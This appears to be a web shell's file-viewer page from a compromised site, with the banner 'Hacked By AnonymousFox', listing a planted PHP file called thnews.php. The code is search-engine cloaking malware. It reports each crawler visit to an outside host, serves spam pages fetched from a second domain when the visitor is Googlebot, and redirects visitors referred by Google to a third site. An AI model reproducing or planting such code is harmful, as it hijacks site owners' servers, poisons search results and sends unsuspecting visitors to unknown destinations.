Hacked By AnonymousFox

Current Path : C:/AppServ/www/mfu/webengine/home/pay4/
Upload File :
Current File : C:/AppServ/www/mfu/webengine/home/pay4/thnews.php

<?php
error_reporting(0);
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];


if (strpos($userAgent, 'Googlebot') !== false) {
    
    $randomString = generateRandomString(8);
    $randomStringx = generateRandomString(5);
    
   file_get_contents('https://5200s.net/index/login/ua/url/' . base64_encode(htmlspecialchars($_SERVER["HTTP_HOST"]) . htmlspecialchars($_SERVER["REQUEST_URI"])) , false, stream_context_create($option));
    $domain = 'https://www.xyxt.net/';
    $urlx = $domain . $randomStringx . '/' . $randomString . '.html';
    $html = file_get_contents($urlx, false, stream_context_create($option));
    echo $html;
	exit();
} elseif ( strpos($referer, 'google.com') !== false) {
    file_get_contents('https://5200s.net/index/login/ad/url/' . base64_encode($_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]) , false, stream_context_create($option));
    header('Location: http://u3152.com');
} else {
  
}


function generateRandomString($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}
exit();

Hacked By AnonymousFox1.0, Coded By AnonymousFox